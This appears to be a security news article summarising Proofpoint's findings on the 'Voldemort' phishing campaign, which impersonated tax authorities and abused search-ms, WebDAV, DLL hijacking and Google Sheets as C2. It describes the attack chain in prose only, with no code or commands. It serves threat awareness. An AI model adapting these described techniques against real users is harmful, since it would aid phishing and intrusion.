Proofpoint researchers have recently uncovered a sophisticated cyberattack campaign that has been leveraging Google Sheets as a command and control (C2) platform. Named “Voldemort” by these researchers, this campaign has been specifically targeting Windows users on a global scale, utilizing a combination of common and rare techniques to deliver custom malware.

The campaign in question began on August 5, 2024, and involved the sending of over 20,000 malicious messages to more than 70 organizations worldwide. These messages were cleverly disguised as communications from tax authorities in various countries such as the U.S., UK, France, Germany, Italy, India, and Japan. By impersonating these authorities and sending emails in their respective languages from compromised domains, the threat actors added a layer of authenticity to their phishing attempts.

The attack chain employed in this campaign is quite sophisticated, with the use of Google Sheets for C2 operations being a standout feature. The malware known as “Voldemort” is a custom backdoor coded in C, capable of gathering information and deploying additional payloads. The attackers employed a variety of techniques, including the abuse of Google Sheets, which is not commonly seen in the threat landscape.

The emails sent as part of the campaign contained links that redirected victims to a landing page hosted on InfinityFree. Upon clicking a “View Document” button on this page, the victim’s browser was checked for a Windows environment. If detected, the victim was redirected to a TryCloudflare-tunneled URI, which prompted the opening of Windows Explorer in a stealthy manner, masquerading the malware as a local PDF file to increase the chances of user interaction.

The malware utilized various techniques, including exploiting the Windows search protocol (search-ms) to display remote files as if they were local. This technique, often used for deploying remote access trojans (RATs), has become popular among cybercriminals. Additionally, saved search file formats (.search-ms) were employed to further obscure the malicious activities.

If a victim executed the malicious LNK file, a PowerShell command was triggered to run Python.exe from a WebDAV share, executing a Python script without downloading files to the host. This script then collected system information and forwarded it to the threat actor’s infrastructure. Subsequently, the malware downloaded a decoy PDF and a password-protected ZIP file, extracting and executing a legitimate executable vulnerable to DLL hijacking.

One of the unique aspects of this campaign was the use of Google Sheets for C2 operations, data exfiltration, and command execution. By authenticating with Google Sheets using a client token, the malware was able to read and write data, effectively using the platform as a communication channel with the threat actors. Various commands, including file operations and system commands, were supported and executed via Google Sheets.

The implications of this campaign are significant, highlighting a combination of APT activity with cybercriminal characteristics. While Proofpoint assesses with moderate confidence that the campaign is likely orchestrated by an advanced persistent threat (APT) actor focused on intelligence gathering, the volume and targeting align more closely with cybercriminal activities. This unique blend of threats poses challenges to cybersecurity professionals, especially given the growing trend of abusing legitimate cloud services like Google Sheets for malicious purposes.

Overall, the Voldemort campaign represents a notable evolution in cyberattack strategies, combining sophisticated techniques with innovative cloud-based services for malicious purposes. As threat actors continue to adapt and exploit new technologies, cybersecurity professionals must remain vigilant and proactive in developing defenses against such complex threats. The use of Google Sheets as a C2 platform underscores the need for heightened security measures and awareness of the potential misuse of legitimate cyberattack services.

Source link